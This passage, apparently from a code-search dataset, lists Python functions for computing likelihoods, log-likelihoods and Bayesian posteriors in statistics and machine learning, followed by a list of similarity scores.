for i in range(end_i):\n if i - (n - 1) < 0:\n continue\n test_corpus_ngrams = test_corpus_ngrams + (self._make_ngrams(test_corpus_tokens, i, n), )\n likelihood_of_test_corpus = 1\n for test_corpus_ngram in test_corpus_ngrams:\n likelihood_of_test_corpus = likelihood_of_test_corpus * probs_per_ngram[test_corpus_ngram]\n return likelihood_of_test_corpus", "def LLR_binom(k, n, p0, EPS=1E-15):\n phat = k/n # maximum likelihood estimate\n phat[phat < EPS] = 2*EPS\n\n # Log-likelihood (density) ratios\n LLR = 2*( (k*np.log(phat)+(n-k)*np.log(1-phat)) - (k*np.log(p0)+(n-k)*np.log(1-p0)))\n return LLR", "def _LL(state, effects, observed_frequencies) -> float:\n observed_frequencies = 
np.array(observed_frequencies)\n predicted_probs = np.array([np.real(np.trace(state.dot(effect))) for effect in effects])\n return sum(np.log10(predicted_probs) * observed_frequencies)", "def beta_binomial_log_likelihood_grad(\n alpha, beta,\n positive_weights, negative_weights, total_weights\n):\n res = np.empty((2, alpha.size))\n res[0] = sparse_gammaln_ratio(alpha, positive_weights, deriv=1)\n res[1] = sparse_gammaln_ratio(beta, negative_weights, deriv=1)\n res -= dense_gammaln_ratio(alpha + beta, total_weights, deriv=1)\n return res", "def compute_log_likelihood(self,params: ndarray) -> float:\n \n pred_mag = self._pred_mag(params,self.times)\n sigma_2 = self.sd_mags**2 \n ln_likelihood = -0.5*np.sum((pred_mag - self.mags)**2 / sigma_2+ np.log(sigma_2))\n\n return ln_likelihood", "def compute_posterior(prior, likelihood, y):\n\n # -------------------------------------------------------------------------\n # ERROR CHECKS -- DO NOT MODIFY\n #\n\n # check that prior probabilities sum to 1\n if np.abs(1 - np.sum(prior)) > 1e-06:\n exit('In compute_posterior: The prior probabilities need to sum to 1')\n\n # check that likelihood is specified as a 2D array\n if len(likelihood.shape) != 2:\n exit('In compute_posterior: The likelihood needs to be specified as ' +\n 'a 2D array')\n\n K, M = likelihood.shape\n\n # make sure likelihood and prior agree on number of hidden states\n if len(prior) != M:\n exit('In compute_posterior: Mismatch in number of hidden states ' +\n 'according to the prior and the likelihood.')\n\n # make sure the conditional distribution given each hidden state value sums\n # to 1\n for m in range(M):\n if np.abs(1 - np.sum(likelihood[:, m])) > 1e-06:\n exit('In compute_posterior: P(Y | X = %d) does not sum to 1' % m)\n\n #\n # END OF ERROR CHECKS\n # -------------------------------------------------------------------------\n\n # -------------------------------------------------------------------------\n # YOUR CODE GOES HERE FOR PART (b)\n #\n # Place your code to compute the log of the posterior here: store it in a\n # NumPy array called `log_answer`. If you exponentiate really small\n # numbers, the result is likely to underflow (i.e., it will be so small\n # that the computer will just make it 0 rather than storing the right\n # value). You need to go to log-domain. 
Hint: this next line is a good\n # first step.\n log_prior = np.log(prior)\n# print(log_prior)\n# print(likelihood)\n# print(y)\n unnormal = log_prior + np.log(likelihood[y,:]).sum(axis=0)\n# print(unnormal)\n log_answer = unnormal - scipy.misc.logsumexp(unnormal)\n# print(log_answer)\n\n #\n # END OF YOUR CODE FOR PART (b)\n # -------------------------------------------------------------------------\n\n # do not exponentiate before this step\n posterior = np.exp(log_answer)\n return posterior", "def lnprob(self, theta, x, y, yerr, bat_pars, tmod):\n lp = self.lnprior(theta)\n if not np.isfinite(lp): # if the prior is infinitely small, return -infinity without calculating the model to save computational time.\n return -np.inf, list(0.0 for xx in x)\n\n likelihood, trial_fit = self.lnlike(theta, x, y, yerr, bat_pars, tmod)\n return lp + likelihood, trial_fit # the second argument goes in the blobs variable and saves all trial fits this way.", "def log_likelihood(self, X, Y):\n\t\tr,c = twod(Y).shape\n\t\tif r == 1 and c != 1:\n\t\t\tY = twod(Y).T\n\n\t\tsoft = self.predict_soft(X)\n\t\treturn np.mean(np.sum(np.log(np.power(soft, Y, )), 1), 0)", "def lnlike(theta, dtarray, dmagarray, sigmaarray):\n gamma, A = theta\n\n aux=np.sum(np.log(like_one(theta,dtarray,dmagarray,sigmaarray)))\n\n return aux", "def log_likelihood_function(self, instance) -> float:\n return self.prior.factor(instance[0])", "def test_posterior_logprobs(self):\n x = list(product([True, False], repeat=2))\n xs = list(e for e in product(x, repeat=3))\n all_obs = list(o for o in xs\n if all(any(e) and not all(e) for e in o))\n total = logsumexp(list(posterior_logprobs(np.array(obs), self.S, self.A, self.E)[1]\n for obs in all_obs))\n assert_allclose(total, np.log(1))", "def model_likelihood(\n self, obs: Tensor, actions: Tensor, next_obs: Tensor\n ) -> Tensor:\n return self.model.log_prob(obs, actions, next_obs)", "def bayes_binomial_ratio_err(k1,n1, k2,n2, prior1=[0.5,0.5], prior2=[0.5,0.5],\n a = None, sigma_a = None, b = None, sigma_b = None, ab_prior_type=['Normal', 'Normal'],\n nd=1000, nd_interp=2000, rmax = None, rval = None, CL=[0.025, 0.975],\n nd_y=1500, nd_nuisance=20, int_nncut=5, int_prec=0.1, numerics='numerical', renorm=True,\n gEPS = 0.1):\n\n # --------------------------------------------------------------------\n # Numerical protection\n if a is not None:\n if (sigma_a / a) < gEPS:\n cprint(f'Forcing normal prior(a) pdf for numerical protection','yellow')\n ab_prior_type[0] = 'Normal'\n\n if b is not None:\n if (sigma_b / b) < gEPS:\n cprint(f'Forcing normal prior(b) pdf for numerical protection','yellow')\n ab_prior_type[1] = 'Normal'\n # --------------------------------------------------------------------\n\n if prior1 == 'Flat':\n prior1 = [1, 1]\n if prior1 == 'Jeffrey':\n prior1 = [0.5, 0.5]\n if prior1 == 'Haldane':\n prior1 = [0, 0]\n\n if prior2 == 'Flat':\n prior2 = [1, 1]\n if prior2 == 'Jeffrey':\n prior2 = [0.5, 0.5]\n if prior2 == 'Haldane':\n prior2 = [0, 0]\n\n print(__name__ + f'.bayes_binomial_ratio: prior1 = {prior1}, prior2 = {prior2}')\n\n # Beta prior parameters\n alpha1,beta1 = prior1[0],prior1[1]\n alpha2,beta2 = prior2[0],prior2[1]\n\n # --------------------------------------------------------------------\n # y-integral samples for each pdf(r) point\n def integrand(r, y, k1_new, k2_new):\n return np.abs(y)*binom_post_2D(p1=r*y, p2=y, \\\n k1=k1_new,n1=n1, k2=k2_new,n2=n2, alpha1=alpha1,beta1=beta1, alpha2=alpha2,beta2=beta2)\n\n # 
--------------------------------------------------------------------\n # Return scale prior pdf values\n def get_ab_prior_pdf(x,mu,sigma, mode):\n\n if mode == 'Gamma':\n gamma_k, gamma_theta = gamma_param_estimate(mu=mu, sigma=sigma)\n print(f'Gamma pdf param k={gamma_k:0.5f}, theta={gamma_theta:0.5f}')\n\n return functions.gamma_pdf(x=x, k=gamma_k, theta=gamma_theta)\n\n elif mode == 'Normal':\n return functions.normpdf(x=x, mu=mu, std=sigma)\n\n else:\n raise Except(f'.bayes_binomial_ratio_err: Unknown scale prior type = {ab_prior_type}')\n\n # --------------------------------------------------------------------\n # Integration range\n def genrange(u, sigma_u, k, n):\n\n MIN = u - int_nncut*sigma_u\n MAX = u + int_nncut*sigma_u\n \n # Boundary control\n if MIN*k < 1: MIN = 1/k \n if MAX*k > n: MAX = n/k\n\n return np.linspace(MIN, MAX, nd_nuisance)\n\n # --------------------------------------------------------------------\n\n # Set maximum ratio to the upper tail\n if rmax is None:\n rmax = 6 * (k1/n1) / (k2/n2)\n\n # Random variable p discretized on a reasonably large interval (loop checks the discretization)\n trials = 1\n while True:\n if rval is None or trials > 1:\n rval = np.linspace(0, rmax, trials * nd)\n pdf = np.zeros(len(rval))\n\n # Via arbitrary precision library (can be very slow for large numbers)\n if numerics == 'mpmath':\n \n pdf = [bayes_posterior_ratio(rval[i], k1,n1, k2,n2, alpha1,beta1, alpha2,beta2) for i in tqdm(range(len(rval)))]\n\n # Via numerical integration\n elif numerics == 'numerical':\n\n pdf = np.zeros(len(rval))\n yval = np.linspace(0,1, nd_y)\n\n # ============================================================\n # Nuisance scale parameters\n\n k1_new = None\n k2_new = None\n\n if a is not None:\n aval = genrange(u=a, sigma_u=sigma_a, k=k1, n=n1)\n a_prior = get_ab_prior_pdf(x=aval, mu=a, sigma=sigma_a, mode=ab_prior_type[0])\n k1_new = aval*k1\n\n # Compute re-normalization (can be crucial near zero, when the left tail is truncated)\n Z = simps(x=aval, y=a_prior); print(f'Prior scale param [a] {ab_prior_type[0]} pdf norm. integral: {Z}')\n a_prior /= Z\n\n if b is not None:\n bval = genrange(u=b, sigma_u=sigma_b, k=k2, n=n2)\n b_prior = get_ab_prior_pdf(x=bval, mu=b, sigma=sigma_b, mode=ab_prior_type[1])\n k2_new = bval*k2\n\n # Compute re-normalization (can be crucial near zero, when the left tail is truncated)\n Z = simps(x=bval, y=b_prior); print(f'Prior scale param [b] {ab_prior_type[1]} pdf norm. integral: {Z}')\n b_prior /= Z\n\n # ============================================================\n # Construct PDF(r) numerically. 
Bayes denominator (normalization) already handled.\n\n # Apply prior scales a (b) to k1 (k2) and the binomial boundary condition.\n # [Note: cannot apply to p1 (p2) => would result formally\n # in an unidentifiable model (singular Fisher information), at least if a (b)\n # would be floating parameters.\n\n # Only a\n if a is not None and b is None:\n print(__name__ + f'.bayes_binomial_ratio_err: Numerator prior scale param a = ({a}, {sigma_a})')\n \n for i in tqdm(range(len(rval))):\n Ia = np.zeros(len(aval))\n\n for j in range(len(aval)):\n I = integrand(r=rval[i], y=yval, k1_new=k1_new[j], k2_new=k2)\n Ia[j] = simps(x=yval, y=I)\n\n # ***\n pdf[i] = simps(x=aval, y=Ia*a_prior)\n\n # Only b\n elif a is None and b is not None:\n print(__name__ + f'.bayes_binomial_ratio_err: Denominator prior scale param b = ({b}, {sigma_b})')\n \n for i in tqdm(range(len(rval))):\n Ib = np.zeros(len(bval))\n\n for j in range(len(bval)):\n I = integrand(r=rval[i], y=yval, k1_new=k1, k2_new=k2_new[j])\n Ib[j] = simps(x=yval, y=I)\n\n # ***\n pdf[i] = simps(x=bval, y=Ib*b_prior)\n\n # Both a and b\n elif a is not None and b is not None:\n print(__name__ + f'.bayes_binomial_ratio_err: Num. and denom. prior scale param a = ({a}, {sigma_a}) and b = ({b}, {sigma_b})')\n\n for i in tqdm(range(len(rval))):\n\n Ia = np.zeros(len(aval))\n for j in range(len(aval)):\n\n Ib = np.zeros(len(bval))\n for k in range(len(bval)):\n I = integrand(r=rval[i], y=yval, k1_new=k1_new[j], k2_new=k2_new[k])\n Ib[k] = simps(x=yval, y=I)\n\n Ia[j] = simps(x=bval, y=Ib*b_prior)\n\n # ***\n pdf[i] = simps(x=aval, y=Ia*a_prior)\n\n # The no nuisance parameters case\n else:\n print(__name__ + f'.bayes_binomial_ratio_err: No prior (scale) parameters.')\n\n for i in tqdm(range(len(rval))):\n I = np.abs(yval)*binom_post_2D(p1=rval[i]*yval, \\\n p2=yval, k1=k1,n1=n1, k2=k2,n2=n2, alpha1=alpha1,beta1=beta1, alpha2=alpha2,beta2=beta2)\n pdf[i] = simps(x=yval, y=I)\n else:\n raise Exception(__name__ + f'.bayes_binomial_ratio_err: Unknown numerics method {numerics}')\n\n # Interpolate\n f2 = interp1d(rval, pdf, kind='quadratic', fill_value='extrapolate')\n r_dense = np.linspace(0, rmax, nd_interp)\n pdf_dense = f2(r_dense)\n \n # Check normalization\n I = simps(y=pdf_dense, x=r_dense)\n if np.abs(I-1) > int_prec:\n trials += 1\n if numerics == 'numerical':\n nd_y *= 2\n nd_nuisance *= 2\n print(__name__ + f'.bayes_binomial_ratio_err: Posterior integral {I:.6f} => increasing discretization')\n if trials > 10:\n raise Exception(__name__ + f'bayes_binomial_ratio_err: PDF(r) normalization I={I} error (set tech-parameters manually)') \n else:\n break\n \n # Normalization of the posterior PDF to unit integral\n if renorm:\n pdf_dense /= simps(x=r_dense, y=pdf_dense)\n\n print(__name__ + f' >> Posterior integral before: {I:.6f} | after: {simps(x=r_dense, y=pdf_dense)}')\n\n discrete_pdf = pdf_dense / np.sum(pdf_dense) # Normalize to discrete PDF\n discrete_cdf = np.cumsum(discrete_pdf) # Discrete CDF\n CR_val,CR_ind = tools.cdf_percentile(discrete_cdf, r_dense, CL)\n \n output = {\n 'val' : r_dense,\n 'pdf' : pdf_dense,\n 'discrete_pdf': discrete_pdf,\n 'discrete_cdf': discrete_cdf,\n 'CR_value' : CR_val,\n 'CR_index' : CR_ind\n }\n return output", "def plot_likelihood(expected_posts_per_month, probability):\n bar_amount = max(10, int(5 * expected_posts_per_month * probability)) # at least 10 bars, not too long of a tail\n print(\"Generating likelihood plot\")\n distribution = [binom.pmf(option, expected_posts_per_month, probability) for option in 
range(bar_amount)]\n plt.bar(range(bar_amount), distribution)\n plt.xlabel(\"occurrences\")\n plt.ylabel(\"likelihood\")\n plt.title(\"Likelihood of word occurences next month\")\n plt.show()", "def nloglikeobs(self, params):\n #print len(params),\n beta = params[:-2]\n df = params[-2]\n scale = params[-1]\n loc = np.dot(self.exog, beta)\n endog = self.endog\n x = (endog - loc)/scale\n #next part is stats.t._logpdf\n lPx = sps_gamln((df+1)/2) - sps_gamln(df/2.)\n lPx -= 0.5*np_log(df*np_pi) + (df+1)/2.*np_log(1+(x**2)/df)\n lPx -= np_log(scale) # correction for scale\n return -lPx", "def poisson_log_likelihood(x, log_rate):\n return x * log_rate - np.exp(log_rate) - lax.lgamma(x + 1.0)", "def calc_likelihood(par_num, par_rng):\n\n likelihoods = np.zeros(np.size(par_rng))\n\n trivial_prior = trivial_prior_class()\n\n pipe = pipeline(observables_generator=hammu12,\n likelihood=likelihood,\n prior=trivial_prior,\n optimizer_class=Hamiltonian_Monte_Carlo)\n\n parameters = [0]*hammu12.get_parameter_dimension()\n for par_val in par_rng:\n parameters[par_num] = par_val\n likelihoods[par_val-par_rng[0]] = pipe._calc_posterior(parameters)\n\n np.save('data%s_RM' % (par_num), likelihoods)", "def _build_likelihood(self):\n\n # Get prior KL.\n KL = self.build_prior_KL()\n\n # Get conditionals\n fmean, fvar = self._build_predict(self.X, full_cov=False)\n\n # Get variational expectations.\n var_exp = self.likelihood.variational_expectations(fmean, fvar, self.Y) * self.obs_weight\n\n # re-scale for minibatch size\n scale = tf.cast(self.num_data, gp.settings.float_type) / tf.cast(tf.shape(self.X)[0], gp.settings.float_type)\n scale = scale / tf.reduce_mean(self.obs_weight)\n return tf.reduce_sum(var_exp) * scale - KL", "def log_likelihood_exp(self, x):\n predictions = self.get_predictions(x)\n ll = 0.\n for measurement in self.get_measurements:\n m_obj = flavio.Measurement[measurement]\n m_obs = m_obj.all_parameters\n exclude_observables = set(m_obs) - set(self.observables)\n prob_dict = m_obj.get_logprobability_all(predictions, exclude_parameters=exclude_observables)\n ll += sum(prob_dict.values())\n return ll", "def brownian_motion_log_returns(param):\n sqrt_delta_sigma = math.sqrt(param.time_rate) * param.vol\n return nrand.normal(loc=0, scale=sqrt_delta_sigma, size=param.time)", "def binary_log_likelihood(y, log_y_hat):\n return tf.reduce_sum(y*(-softplus(-log_y_hat)) +\n (1 - y)*(-log_y_hat-softplus(-log_y_hat)),\n 1)" ]
[ "0.6838529", "0.6828888", "0.68097115", "0.674418", "0.67185456", "0.66190183", "0.66117036", "0.6602112", "0.65802485", "0.657394", "0.6549069", "0.65399593", "0.6539858", "0.65330833", "0.65202075", "0.64768666", "0.647659", "0.6444814", "0.6444441", "0.638896", "0.6378039", "0.63620603", "0.6357647", "0.63511467", "0.63455725", "0.6332465", "0.6308469", "0.63079995", "0.63072234", "0.6298493", "0.62830865", "0.6270564", "0.62594086", "0.624422", "0.6237342", "0.6235021", "0.62301815", "0.6212115", "0.6211884", "0.6211629", "0.6178929", "0.61781543", "0.616288", "0.6158828", "0.61434627", "0.61273885", "0.6117766", "0.6111547", "0.6106596", "0.6102621", "0.6092983", "0.60929227", "0.6080551", "0.60779303", "0.60653436", "0.60630405", "0.60606104", "0.6054574", "0.60514486", "0.60417217", "0.60354596", "0.60346276", "0.6028603", "0.6026584", "0.6022251", "0.6018485", "0.6016998", "0.5999549", "0.5998937", "0.5998304", "0.5997439", "0.5991243", "0.5989531", "0.59815544", "0.5972668", "0.5971176", "0.59653527", "0.5956561", "0.5941796", "0.5940286", "0.5940241", "0.59352314", "0.5929154", "0.59260905", "0.59189546", "0.591816", "0.59159553", "0.59145415", "0.5911106", "0.59101856", "0.59078467", "0.58981663", "0.58973956", "0.58954453", "0.5893891", "0.58936", "0.58920485", "0.5887853", "0.5883396", "0.58781683" ]
0.66105807
7
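How document_rank relates to document_score is not documented in the dump, but in this row exactly seven negatives score above 0.66105807, which suggests (an assumption, checked only against this single row) that the rank is the positive document's 0-based position among all candidates sorted by descending score:

def recompute_rank(document_score, negative_scores):
    # Number of negatives that outscore the positive document, i.e. its
    # 0-based rank under an assumed higher-is-better retriever score.
    # Scores are stored as strings in this dataset, hence the float() casts.
    return sum(1 for s in negative_scores if float(s) > float(document_score))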
Extract the known vocabulary from our training data
def get_vocab(trainingData):
    # Collect the unique tokens across all training examples. The original
    # reduce/map one-liner works only on Python 2: in Python 3, map returns
    # an iterator that cannot be concatenated with +.
    return set(pair[0] for example in trainingData for pair in example)
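A usage sketch, assuming (as the y[0] access in both documents implies) that each training example is a sequence of (token, label) pairs:

trainingData = [
    [("the", "DET"), ("cat", "NOUN"), ("sat", "VERB")],
    [("the", "DET"), ("dog", "NOUN")],
]
print(sorted(get_vocab(trainingData)))  # ['cat', 'dog', 'sat', 'the']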
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_vocab(self):\n\n\t\tself.parse_transcript() \n\t\tself.purge_words()\n\t\tself.analyze_words()\n\t\tself.sort_word_analysis()", "def get_vocabulary(documents):\n cv_model = CountVectorizer(binary=True)\n cv_model.fit(documents)\n\n vocabulary = cv_model.get_feature_names()\n vocabulary = list(map(str, vocabulary))\n\n return vocabulary", "def vocabulary(self) -> np.ndarray:\n return np.array(\n list(set(word for text in self.preprocess_corpus for word in text))\n )", "def create_vocab():\n \n cutoff = CUTOFF\n \n lines = open(INFNAME_FORMAT.format(\"train\")).readlines() \\\n + open(INFNAME_FORMAT.format(\"test\")).readlines()\n raw = [process_line(l) for l in lines]\n cntx = Counter( [ w for e in raw for w in e ] )\n vocab = { x for x, y in cntx.items() if y > cutoff }\n \n return vocab", "def known(words):\n return [w for w in words if w in tokenizer.vocab] #change vocab file?", "def get_vocab(train_data, valid_data, test_data):\n \n print(\"-----------------------------------------------\")\n print(\"Constructing Vocabulary of Words and Characters\")\n print(\"-----------------------------------------------\")\n\n with open(train_data,'r') as f:\n train_corpus = f.readlines()\n f.close()\n\n with open(valid_data,'r') as f:\n valid_corpus = f.readlines()\n f.close()\n\n with open(test_data,'r') as f:\n test_corpus = f.readlines()\n f.close()\n\n word_vocab = {}\n char_vocab = {}\n max_len = 0\n\n word_vocab, char_vocab, max_len = make_vocab(train_corpus, word_vocab, char_vocab, max_len)\n word_vocab, char_vocab, max_len = make_vocab(valid_corpus, word_vocab, char_vocab, max_len)\n word_vocab, char_vocab, max_len = make_vocab(test_corpus, word_vocab, char_vocab, max_len)\n\n char_vocab['<SOT>'] = len(char_vocab)+1 \n char_vocab['<EOT>'] = len(char_vocab)+1\n\n print(\"Word Vocabulary Size : %d\"%len(word_vocab))\n print(\"Character Vocabulary Size : %d\"%len(char_vocab))\n print(\"Max Length of Word - 2 : %d\"%max_len)\n\n return word_vocab, char_vocab, max_len", "def vocabulary(self):\n return self._vocabulary", "def vocabulary(corpus_tokenized):\n vocab = list()\n for element in corpus_tokenized:\n document = element['document']\n for word in document:\n if word not in vocab:\n vocab.append(word)\n return vocab", "def vocabulary(self):\n return [recid for recid in self._model.vocab]", "def load_target_vocab(self):\n vocab = [line.split()[0] for line in open(os.path.join('preprocessed', 'all_vocab.txt'), 'r').read().splitlines()]\n self.word2idx = {word: idx for idx, word in enumerate(vocab)}\n self.idx2word = {idx: word for idx, word in enumerate(vocab)}\n self.vocab_size = len(self.word2idx)", "def vocabulary(self):\n lst = []\n for key in self.frequencies().keys():\n lst.append(key)\n return sorted(lst)\n #for lines in self.lines:\n # line = lines.strip(os.linesep)\n # wordslst = line.split()\n # for word in wordslst:\n # if word not in lst:\n # lst.append(word.lower())\n #return sorted(lst)", "def load_vocabulary(self):\n vocab_file = open(vocabulary_path, \"r\")\n self.vocab_list = vocab_file.read().split(\"\\n\")\n vocab_file.close()\n print(\"[INFO] Reading vocabulary...\")\n print(self.vocab_list[0:15])", "def get_vocabulary(corpus,\n initial_vocab={\n '<unk>': 0,\n '<sssss>': 1\n },\n vocabsize=0):\n vocab = copy.copy(initial_vocab)\n word_count = Counter()\n for text in corpus:\n for w in text.split(' '):\n word_count[w] += 1\n\n # if vocabulary size is specified, most common words are selected\n if vocabsize > 0:\n for w in word_count.most_common(vocabsize):\n if 
w[0] not in vocab:\n vocab[w[0]] = len(vocab)\n if len(vocab) >= vocabsize:\n break\n else: # all observed words are stored\n for w in word_count:\n if w not in vocab:\n vocab[w] = len(vocab)\n return vocab", "def build_vocab(self):\n if self.test_file is None:\n print('test_file is None')\n file_list = [self.train_file, self.dev_file]\n else:\n file_list = [self.train_file, self.dev_file, self.test_file]\n\n examples = []\n for file_name in file_list:\n examples += ParseExample.load_data(file_name)\n\n sents = []\n for example in examples:\n warrant0, warrant1, reason, claim, debate_meta_data, negclaim = example.get_six(type=WORD_TYPE)\n sents.append(warrant0)\n sents.append(warrant1)\n sents.append(reason)\n sents.append(claim)\n sents.append(debate_meta_data)\n\n vocab = data_utils.build_word_vocab(sents)\n\n return vocab", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences)) # 实际没用到\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv = list(sorted(vocabulary_inv))\n # 加入 <UNK>\n vocabulary_inv.insert(0, '</s>')\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def load_vocab(self):\n\n if self.vocabulary_path: \n # For now, the file format is derived from the file extension.\n if self.vocabulary_path.endswith('csv'):\n self.logger.info(\"Filter spymaster vocabulary by csv-file: {}\".format(self.vocabulary_path))\n with open(self.vocabulary_path, 'r') as fin:\n reader = csv.reader(fin)\n header = next(reader)\n for row in reader:\n word = row[1].lower()\n self.update_vocab(word) \n elif self.vocabulary_path.endswith('txt'):\n self.logger.info(\"Filter spymaster vocabulary by txt-file: {}\".format(self.vocabulary_path))\n with open(self.vocabulary_path, 'r') as fin:\n for line in fin:\n word = line.strip()\n self.update_vocab(word)\n else:\n raise ValueError(\"Unknown file format for filter spymaster vocabulary.\") \n else:\n self.logger.info(\"Load spymaster vocabulary from gensim.models.KeyedVectors.\")\n self.vocab = self.model.vocab\n self.vocab_size = len(self.vocab)\n\n self.logger.info(\"Spymaster vocabulary size is {}\".format(self.vocab_size))", "def load_vocab():\n # vocab loaded internally at google\n unused = r.sp_model\n del unused\n return r", "def trainingsVocabulary(context):\n ct = getToolByName(context,'portal_catalog')\n dictSearch = {'portal_type':'apyb.papers.training',\n 'sort_on':'sortable_title',\n 'review_state':'confirmed'}\n trainings = ct.searchResults(**dictSearch)\n trainings = [SimpleTerm(b.UID,b.UID,b.Title) for b in trainings]\n return SimpleVocabulary(trainings)", "def get_input_vocab():\n vocab = set()\n vocab.update(list(string.ascii_letters))\n vocab.update(list(string.digits))\n vocab.update(list(string.punctuation))\n vocab.update(list(string.whitespace))\n vocab.update(['<unk>', '<pad>'])\n return dict(zip(sorted(vocab), list(range(len(vocab)))))", "def preproc_user_input(txt, model):\r\n txt = pre_process(txt)\r\n txt_tokenized = [word for word in txt.split(\" \") if word in model.wv.vocab]\r\n return \" \".join(txt_tokenized)", "def vocab(self):\n num_words = -1\n if not self._vocab:\n c = self._conn.cursor()\n c.execute('select feature, censored, word_id from vocab')\n\n d = {}\n for ww, cc, ii in c:\n d[ii] = ww\n d[ww] = ii\n if cc == 1:\n self._censored.add(ww)\n num_words = max(ii, num_words)\n\n logger.info(\"Loaded vocab with %i words; %i censored\" % 
\\\n (len(d) / 2, len(self._censored)))\n\n # Add the start symbol\n if not START_SYMBOL in d:\n d[START_SYMBOL] = num_words + 1\n d[num_words + 1] = START_SYMBOL\n\n logger.info(\"Retrieved %i words\" % num_words)\n self._vocab = d\n\n return self._vocab", "def getVocabularyDict(vocabulary: dict, training_feature: TrainingFeature):\n vocab = {}\n index = 0\n if training_feature.FEATURE_DROP_FREQUENT_WORDS:\n print(\"Select vocabdict with drop_frequent\")\n array = sorted([(k, v) for (k, v) in vocabulary.items()], key= lambda x: x[1])\n print(\"Total length: \", len(array))\n length = len(array)\n array = array[int(length * 0.75): int(length * 1.0)][0:training_feature.VOCAB_SIZE]\n for (k , _) in array:\n vocab.setdefault(k, index)\n index += 1\n else:\n print(\"Select vocabdict with non_drop_frequent\")\n array = sorted([(k, v) for (k, v) in vocabulary.items()], key=lambda x: x[1])\n length = len(array)\n print(\"Total length: \", length)\n array = array[-training_feature.VOCAB_SIZE:]\n for (k, _) in array:\n vocab.setdefault(k, index)\n index += 1\n # for (k, v) in vocabulary.items():\n # if v > 50:\n # vocab.setdefault(k, index)\n # index += 1\n print(\"VocabDict length: \", len(vocab))\n # print(vocab)\n return vocab", "def _get_vocabulary(connection):\n print('---Getting vocabulary---')\n vocabulary = {}\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM words;\")\n res = cursor.fetchall()\n num_words = 0\n for word in res:\n vocabulary[word[0]] = num_words\n num_words += 1\n return vocabulary", "def initialize_vocabulary(self,vocabulary_path):\n if tf.gfile.Exists(vocabulary_path):\n vocab = corpora.Dictionary.load(vocabulary_path)\n print(\"vocab length: \",len(vocab.token2id))\n\n return vocab.token2id, vocab.token2id.keys()\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def get_vocab(self):\n if self.dtm is None:\n raise ValueError(\"Preprocessor has not been fit. \\\n Provide series of articles.\")\n return list(self.dtm.columns)", "def build_vocab(self, corpus):\n if self.vocabulary_counts != None:\n logger.debug(\"building vocabulary from provided frequency map\")\n vocab = self.vocabulary_counts\n else:\n logger.debug(\"default vocabulary building\")\n super(Skipgram, self).build_vocab(corpus)\n return\n\n # assign a unique index to each word\n self.vocab, self.index2word = {}, []\n\n for word, count in vocab.iteritems():\n v = Vocab()\n v.count = count\n if v.count >= self.min_count:\n v.index = len(self.vocab)\n self.index2word.append(word)\n self.vocab[word] = v\n\n logger.debug(\"total %i word types after removing those with count<%s\" % (len(self.vocab), self.min_count))\n\n if self.hs:\n # add info about each word's Huffman encoding\n self.create_binary_tree()\n if self.negative:\n # build the table for drawing random words (for negative sampling)\n self.make_table()\n # precalculate downsampling thresholds\n self.precalc_sampling()\n self.reset_weights()", "def vocabulary(self, config=Config()):\n raise NotImplementedError(\"Class %s doesn't implement vocabulary()\" % self.__class__.__name__)", "def getVocabulary(self): # real signature unknown; restored from __doc__\n pass", "def build_vocab(data):\n # data = _read_words(filename)\n counter = collections.Counter(data)\n # print('counter', counter) # dictionary for the occurrence number of each word, e.g. 
'banknote': 1, 'photography': 1, 'kia': 1\n count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))\n # print('count_pairs',count_pairs) # convert dictionary to list of tuple, e.g. ('ssangyong', 1), ('swapo', 1), ('wachter', 1)\n words, _ = list(zip(*count_pairs))\n word_to_id = dict(zip(words, range(len(words))))\n # print(words) # list of words\n # print(word_to_id) # dictionary for word to id, e.g. 'campbell': 2587, 'atlantic': 2247, 'aoun': 6746\n return word_to_id", "def build_doc_sense_vec(self):\n\t\twith codecs.open(self.vocab_file, encoding='utf-8', mode='r') as infile:\n\t\t\tline = infile.readline()\n\t\t\ti = 0\n\t\t\twhile line:\n\t\t\t\tword = line.split()[0]\n\t\t\t\tif not self.word2IdVocabulary.has_key(word):\n\t\t\t\t\t# print i, word\n\t\t\t\t\t# else:\n\t\t\t\t\tself.word2IdVocabulary[word] = i\n\t\t\t\tif not self.id2WordVocabulary.has_key(i):\n\t\t\t\t\tself.id2WordVocabulary[i] = word\n\t\t\t\tline = infile.readline()\n\t\t\t\ti += 1\n\t\t\tself.vocab_num = len(self.word2IdVocabulary)\n\t\t\tprint \"vocabulary number:\" + str(self.vocab_num)\n\n\t\twith codecs.open(self.vec_file, encoding='utf-8', mode='r') as vecfile:\n\t\t\twith codecs.open(self.vec_out_file, encoding='utf-8', mode='a+') as vec_outfile:\n\n\t\t\t\tfor i, line in enumerate(vecfile):\n\t\t\t\t\tif i % 10000 == 0:\n\t\t\t\t\t\tprint i\n\t\t\t\t\t# if i > 72:\n\t\t\t\t\t# \tbreak\n\t\t\t\t\tif i == 0:\n\t\t\t\t\t\ta, b, c = map(int, line.split()[:3])\n\t\t\t\t\t\tprint('Number of sememes: {}\\n'\n\t\t\t\t\t\t\t 'Number of words: {}\\n'\n\t\t\t\t\t\t\t 'Dimension of vectors: {}'.format(a, b, c))\n\t\t\t\t\telif i > 462667:\n\t\t\t\t\t\tsline = line.strip('\\n').split()\n\t\t\t\t\t\tword = sline[0]\n\t\t\t\t\t\tvector_list = []\n\t\t\t\t\t\tvector_list.append(sline[1:])\n\t\t\t\t\t\tvector_array = np.array(vector_list)\n\t\t\t\t\t\tword_id = self.word2IdVocabulary[word]\n\t\t\t\t\t\tif not self.vectors.has_key(word_id):\n\t\t\t\t\t\t\tself.vectors[word_id] = vector_array\n\t\t\t\t\t\t# vector_mean = np.mean(vector_array, axis=0)\n\t\t\t\t\t\tif not self.vector_mean.has_key(word_id):\n\t\t\t\t\t\t\tself.vector_mean[word_id] = vector_array\n\t\t\t\t\t\t# vec_outfile.write(line)\n\t\t\t\t\telif i > 462887:\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tsline = line.strip('\\n').split()\n\t\t\t\t\t\tword = sline[0]\n\t\t\t\t\t\tsense_num = 